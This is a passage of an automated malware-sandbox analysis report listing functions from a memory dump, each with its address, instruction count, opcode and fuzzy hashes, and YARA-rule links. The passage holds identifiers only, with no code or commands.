                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a693214f1f3de5d56a762807b6656d50b80c39679daa8844bd876ff9c0b05ccb
                                      • Instruction ID: 2b1e1d53d8ca840ed0d09514d847ae55bd8c5d7a65f4030033b0b9283ac27ffd
                                      • Opcode Fuzzy Hash: a693214f1f3de5d56a762807b6656d50b80c39679daa8844bd876ff9c0b05ccb
                                      • Instruction Fuzzy Hash: 1CD10171A0020A9BDF14CF69D884ABFF7A1BF55304F18462DEA12DB391EB34D948CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017BF3B0 Relevance: .3, Instructions: 321COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 551ec327f40c3cbe00f8f87ea1650926697406c8e0fc7572e4bed1ce1ed84291
                                      • Instruction ID: 2839d3b9f7adde1791a383119bde9439e4cb671b5e7e0c70defd2e7c2244b007
                                      • Opcode Fuzzy Hash: 551ec327f40c3cbe00f8f87ea1650926697406c8e0fc7572e4bed1ce1ed84291
                                      • Instruction Fuzzy Hash: 9CC1B271A011258BDB25CF1DC8D4BFAFBA1FF44B04F294199EA429B396E734DA41CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C903B Relevance: .3, Instructions: 287COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 661dc6df43ce95418bbdab7fe85ff14e7c5c86ffcdf5f5513fd4887557f51f68
                                      • Instruction ID: b04aaa5338a1e281b952893cdea064381b2881769cd3739bcab46ffdb7d86db6
                                      • Opcode Fuzzy Hash: 661dc6df43ce95418bbdab7fe85ff14e7c5c86ffcdf5f5513fd4887557f51f68
                                      • Instruction Fuzzy Hash: ACA16F7150020AAFEB139F98CC99FAEBBB8EF55714F004158FA00AB2A4D775DD51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A8320 Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb858c55d83a997dfb8fc4cff317ea6e942f8a82e2559fbf98dea156c0a970d8
                                      • Instruction ID: d082db57a408af316a73ac734e3ae4e1bcfefaadeddc1cc0fe2ffce25242d8d3
                                      • Opcode Fuzzy Hash: cb858c55d83a997dfb8fc4cff317ea6e942f8a82e2559fbf98dea156c0a970d8
                                      • Instruction Fuzzy Hash: A9C14A701083458FE765CF19C894BABF7E4BF88304F544A6DE98987291D774EA48CF92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179C3C7 Relevance: .3, Instructions: 280COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81db1ff5c8b165ccc521ab04976858479d0d7527a7a08c360b341879f829aae4
                                      • Instruction ID: 0d3e8c5f0ae25b84a04f5f3b1d597ac2594da4846517c049b7334da105af3488
                                      • Opcode Fuzzy Hash: 81db1ff5c8b165ccc521ab04976858479d0d7527a7a08c360b341879f829aae4
                                      • Instruction Fuzzy Hash: 2AB18F70A002568BDF65DF58D890BAAF7F1EF44700F1485EAD50AEB395EB309E85CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017CE597 Relevance: .3, Instructions: 278COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d09221e68935d96d88198370db98dbaa5b317ef158e57a7b84ccc49007beeb92
                                      • Instruction ID: b43a27db1f00d0cddda551bbc85f3103fde75657d944b582883385911d570b04
                                      • Opcode Fuzzy Hash: d09221e68935d96d88198370db98dbaa5b317ef158e57a7b84ccc49007beeb92
                                      • Instruction Fuzzy Hash: 19A1E631E006599FEB32DB9CC858BADBFA4AF04B14F154169EA11FB2D1DB749E40CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E0145 Relevance: .3, Instructions: 276COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5b27d31c7e6775a8083926086feb639b3b4586c122b228ad1a36c28d21ba8a7
                                      • Instruction ID: 04de2f706fdbcdd0502a5d129dae41e104eb0ef623a06cfbec35ce0a4e2ba6a2
                                      • Opcode Fuzzy Hash: e5b27d31c7e6775a8083926086feb639b3b4586c122b228ad1a36c28d21ba8a7
                                      • Instruction Fuzzy Hash: 09A1BE71B006069FDB25CF69C998BAAB7E5FF58318F004029F905E7285EBB4A911CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 018741C0 Relevance: .3, Instructions: 275COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19ebf872ca2f03118b1dd8fc15505d015576d16feb749ed5d556b345e3df7862
                                      • Instruction ID: 4d9cd3f0ce26b4850ade2bd342dbefc153f8f1b0ba7eabf0126e10ea7ab1f01a
                                      • Opcode Fuzzy Hash: 19ebf872ca2f03118b1dd8fc15505d015576d16feb749ed5d556b345e3df7862
                                      • Instruction Fuzzy Hash: 98A1ED72604612EFC722DF28C984B6ABBE9FF48704F150928F58ADB655D334EE41CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017BE340 Relevance: .3, Instructions: 261COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e11c607cd897c7960b798cac8cc11a1f3701e09042a8302a6c532cc2f1a3bc13
                                      • Instruction ID: 56e4bb987d05462820edad8a831cf4cd50bd579d880ba7cac6197f9b1f73b249
                                      • Opcode Fuzzy Hash: e11c607cd897c7960b798cac8cc11a1f3701e09042a8302a6c532cc2f1a3bc13
                                      • Instruction Fuzzy Hash: 8B912731E01616CBDB259B58C8C4BFEFBA1EF94714F1540A9F906DB386EB389A01C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A1091 Relevance: .3, Instructions: 259COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 65f9e2aa894e6b3299e4f83b6fba93883e1ab71a7ba55a836372b4c382c806f9
                                      • Instruction ID: aca022b2020bdb4682a6ef42b69016038d8c1a05777ce0d68040c28d09b74000
                                      • Opcode Fuzzy Hash: 65f9e2aa894e6b3299e4f83b6fba93883e1ab71a7ba55a836372b4c382c806f9
                                      • Instruction Fuzzy Hash: 91B100756093418FE754CF28C480A6BFBE1BF88304F584A6EE9998B352D731E945CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A93E6 Relevance: .3, Instructions: 259COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a57cbb4214e8c6c9e466692c8708b6b837f7063b4ecdca36fec5fc55fc96c99
                                      • Instruction ID: 7d724fb365262e7bdd1c6439f5a767896b1999d0c75db132202f8915d754b1d2
                                      • Opcode Fuzzy Hash: 1a57cbb4214e8c6c9e466692c8708b6b837f7063b4ecdca36fec5fc55fc96c99
                                      • Instruction Fuzzy Hash: D2B18CB1900306CFDB25CF1CD5897A9BBF0BB84318FA84299DA619B296D730D952CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0185B1EF Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27e60e516d35ec9047a7fb3c4e54e30fa303ae2a0bcf9aafb2fe7f39f4503b97
                                      • Instruction ID: f1a3c8578cb364701075d2b35c00a0fce559eecc2137f7aafaca3a1102fa332f
                                      • Opcode Fuzzy Hash: 27e60e516d35ec9047a7fb3c4e54e30fa303ae2a0bcf9aafb2fe7f39f4503b97
                                      • Instruction Fuzzy Hash: AC719E35A0021A9BDFA0CE59C4C0ABEBBE7EF64750F14415AED00EB242E334DA51C7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017DE244 Relevance: .2, Instructions: 212COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e33ae5e7d2962dcb5f4ae1db20d0a2722080139baba9afaa81d494fe43de0e48
                                      • Instruction ID: cd2f0ba0c208232febdd84e2b08416194a6fbbfe2a440bb489d6674e87afc932
                                      • Opcode Fuzzy Hash: e33ae5e7d2962dcb5f4ae1db20d0a2722080139baba9afaa81d494fe43de0e48
                                      • Instruction Fuzzy Hash: 34815D71A00609AFDB12CFA9C880AEEFBFAFF48354F144429E556E7214DB30A945DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017BC590 Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c00ee78811443b6230d3755850a30117fa47f258ed213ea6ec8c12e8f7a5112
                                      • Instruction ID: 2c0f7f141a07f63d5114d1e36b3f9e9acbc6187b53a99adca5557971e2bf64e4
                                      • Opcode Fuzzy Hash: 1c00ee78811443b6230d3755850a30117fa47f258ed213ea6ec8c12e8f7a5112
                                      • Instruction Fuzzy Hash: AA71A071D056299BCB26CF58C890BFEFBB5FF49714F14815AE842A7390E7309A41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017B255B Relevance: .2, Instructions: 201COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aecba8f4d72d4b426105bf0eac62dc5fcfce782479f21b543c7261bf07e3ed21
                                      • Instruction ID: 825c96a6d17331e93997658209d8c2a6b587c6f77004c0f439fe1af8c6954d4e
                                      • Opcode Fuzzy Hash: aecba8f4d72d4b426105bf0eac62dc5fcfce782479f21b543c7261bf07e3ed21
                                      • Instruction Fuzzy Hash: D871D1316052428FD712DF2CC884B6AF7E5FF88304F1485AAE855CB796EB34E945CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0182001C Relevance: .2, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e4390e14878a9c603aeb1a8018c444fe200b5ffe4b47456f235e7577342de1b
                                      • Instruction ID: 9abd467d313e56e5edbff5d54fba8814926d289c76acfe875b76c0f1236b064f
                                      • Opcode Fuzzy Hash: 2e4390e14878a9c603aeb1a8018c444fe200b5ffe4b47456f235e7577342de1b
                                      • Instruction Fuzzy Hash: C3715C71A0061AEFDB11DFA9C984BEEBBB9FF88300F104569E505E7254DB34EA45CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017DB530 Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d58152ccddf490b7ec1dd625fe610b492789548457f017bb3a474dab613f62b
                                      • Instruction ID: d0d32775b45474a28e5a54271f319d582c2ec1a1fd562a73355ed5a683c6fe9c
                                      • Opcode Fuzzy Hash: 0d58152ccddf490b7ec1dd625fe610b492789548457f017bb3a474dab613f62b
                                      • Instruction Fuzzy Hash: 485108B22042469FD730EF68C988F6BB7ECEB94724F14062DF91197199DB30DA01CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179B273 Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f20a3560937bb3fd5b15d9b934e4503af2184314a15abec014ec288fe58e57e
                                      • Instruction ID: e5ac4481f4df04ed921e17c2170770048afd7ef73ba095ed58c32c7eecb4af35
                                      • Opcode Fuzzy Hash: 4f20a3560937bb3fd5b15d9b934e4503af2184314a15abec014ec288fe58e57e
                                      • Instruction Fuzzy Hash: D44123716006019FDF269F29E985F6BFBA8FF44710F15446EEA09DB255D770A840CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C953A Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2d35b2e29a58e616ed55006bf3fbfdb2d23c42d6105eea802c452ef4e6b22af2
                                      • Instruction ID: eecbc75611ff87368afb0c397f30eaed744737f1c7690c0fa7272caab8a167df
                                      • Opcode Fuzzy Hash: 2d35b2e29a58e616ed55006bf3fbfdb2d23c42d6105eea802c452ef4e6b22af2
                                      • Instruction Fuzzy Hash: 9551AB7190060DAAEF629FE4CC95BEDFBF8FF15704F20012EA690A7196DB719A40DB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A70B2 Relevance: .2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6b57ca65b0ddcb0dd408fb21b04044cdb50f73ba1692fb50cf81fa800a5a892f
                                      • Instruction ID: 1bf281fda1d0556d52bdc72070732cd9bc1a4af4a5240ecc3a867488fbe4e93a
                                      • Opcode Fuzzy Hash: 6b57ca65b0ddcb0dd408fb21b04044cdb50f73ba1692fb50cf81fa800a5a892f
                                      • Instruction Fuzzy Hash: 0251E230A0060AEFDB1ADB68CC4876EF7F5BF84325F144269D512D3290EB74EA01CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C4511 Relevance: .2, Instructions: 156COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 191a54b94049edab8bae514f61745f9a9e51e7498e7670db3c58f29478cb5baf
                                      • Instruction ID: 5ca9b3569a09c9b0a7355ac9a2cd9ee2325eb15ad3686b34b42aa0ef8599c99b
                                      • Opcode Fuzzy Hash: 191a54b94049edab8bae514f61745f9a9e51e7498e7670db3c58f29478cb5baf
                                      • Instruction Fuzzy Hash: 25516E71E0061AABDF15CF98C854BEEFBB9AF44B14F14406DEA02BB344D774DA448BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A514D Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8eb74727f9bd907256d315948a58631db474b75f5fe37672ad30ddf28de83056
                                      • Instruction ID: 9f610c8fabe5d4c3ba2a166ddde3a292eb2848248c4f6b546a349eba5cade420
                                      • Opcode Fuzzy Hash: 8eb74727f9bd907256d315948a58631db474b75f5fe37672ad30ddf28de83056
                                      • Instruction Fuzzy Hash: F951AFB1A05209DFEF22DBA8C844BEDF7B5BB98354FA40258F911EB281D774A9408B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01873297 Relevance: .1, Instructions: 139COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19a3f97ab95e2a439d92950485c6c41ce376fef62f17ae4ec1633a2378c99eab
                                      • Instruction ID: 1ac557fd08e1df76edb216379caf5902950a92635d1cceeafe8e6bea9bd1832f
                                      • Opcode Fuzzy Hash: 19a3f97ab95e2a439d92950485c6c41ce376fef62f17ae4ec1633a2378c99eab
                                      • Instruction Fuzzy Hash: 7A519F71600606EFDB16CF14C584A56FBF5FF55308F1481AAE908DF212E771EA86CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A60B4 Relevance: .1, Instructions: 133COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28166189ab14e246a8ca1198a438b3dcb2cdfec4fa03ddd01cb99e64f8f570c2
                                      • Instruction ID: 2e6c22edbf0cea3fc30a6b0db641b0bf7436c8bd4081946a49630bd07aa09b9f
                                      • Opcode Fuzzy Hash: 28166189ab14e246a8ca1198a438b3dcb2cdfec4fa03ddd01cb99e64f8f570c2
                                      • Instruction Fuzzy Hash: F451D670940106DBDB26CB28CC54BE9FBB1FF55314F5883A9E119A72D2E734AA81CF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179B0D6 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f234f477f8233d381f42d93524dda60d1c0a88ff3894efd6ba3e47a6af7abe54
                                      • Instruction ID: b2dd336b5f08fe6c04dc11f599e793e5045eede8d30399e1a3b4f1b0f60bc1b4
                                      • Opcode Fuzzy Hash: f234f477f8233d381f42d93524dda60d1c0a88ff3894efd6ba3e47a6af7abe54
                                      • Instruction Fuzzy Hash: 54418FB0640606EFDB22AF69E884F6BFBA8EF50754F044469E601CB295E770D944CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0186832E Relevance: .1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1a3ad3a181cf001a64175be87df968e7f68b632ef1ef33af84e51d0fc59335a
                                      • Instruction ID: 7d638329e974abe350bd2e0804a9bf3639abbef31826569f05d4bf0986772b10
                                      • Opcode Fuzzy Hash: c1a3ad3a181cf001a64175be87df968e7f68b632ef1ef33af84e51d0fc59335a
                                      • Instruction Fuzzy Hash: 72418071B00316ABDB15DF9DC984AAFBBBEAF89710F144069A908E7351DA70DF4087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017CA3D0 Relevance: .1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f982a0537ecaf5ebb0fe56e313042a09fb4b560f54ecdcdec7d2900ea089082
                                      • Instruction ID: d9cdf823cae1f45bc06c0286d5184748e245ef3b5bc8e1f789521dc67f965839
                                      • Opcode Fuzzy Hash: 8f982a0537ecaf5ebb0fe56e313042a09fb4b560f54ecdcdec7d2900ea089082
                                      • Instruction Fuzzy Hash: F441BE32A01609CFDB22CF6CD9987EAFBB0FB18B15F18019DD411A7295EB349A41CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A258C Relevance: .1, Instructions: 119COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18bd861fd9202132534e428ee4f941ff7dc1ee1229ae49ed05be0e70eee28b2c
                                      • Instruction ID: 98dc81a94b54f27e0191da0a0737b7e85456409114c33badf78dc1a4aef21191
                                      • Opcode Fuzzy Hash: 18bd861fd9202132534e428ee4f941ff7dc1ee1229ae49ed05be0e70eee28b2c
                                      • Instruction Fuzzy Hash: 6F417FB1902705CFCB26DF28C944759F7B1FB94314F65829AC1169BAA6EB30AA81CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01820267 Relevance: .1, Instructions: 111COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 819e693292960a36fe0e1d38087481f6c97ca3accf741abf66166a49ac7d52d4
                                      • Instruction ID: c5349229c793b8c5b626cfbf986cd32910b825ad8ad1cca5e24037888f968fb9
                                      • Opcode Fuzzy Hash: 819e693292960a36fe0e1d38087481f6c97ca3accf741abf66166a49ac7d52d4
                                      • Instruction Fuzzy Hash: D941B4726046529FD321DF6CC884B6BB7E9FF88700F040A19F955DB690E730DA54C7A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017B0231 Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b5ab7a23cd433f5424d33fa431cc27b2c15fc5db46e85a97b6e09af3a9f905b5
                                      • Instruction ID: 517d58d49b91fbcb70f0f64200d4bba2cc9ea9b7edc0279e50e79e164d91b15a
                                      • Opcode Fuzzy Hash: b5ab7a23cd433f5424d33fa431cc27b2c15fc5db46e85a97b6e09af3a9f905b5
                                      • Instruction Fuzzy Hash: 4E312731A04644ABDB228BA8CC84BDBFFB8EF54350F0445A5F855D7392C7748988CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C91D4 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bfaf177bfe975cd3a8d87adeba16ce5470412bd7ff73779e6d4f42100e33f255
                                      • Instruction ID: c0b14a0fd6825e6b33a0905f549894afbab9e0ce5d63a4a85d70fdb6cdbf53e7
                                      • Opcode Fuzzy Hash: bfaf177bfe975cd3a8d87adeba16ce5470412bd7ff73779e6d4f42100e33f255
                                      • Instruction Fuzzy Hash: 77318472A042299FDB618B58CC44F9AFBB6EF45B14F1101DDA64CE7244DB709E84CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A41C0 Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
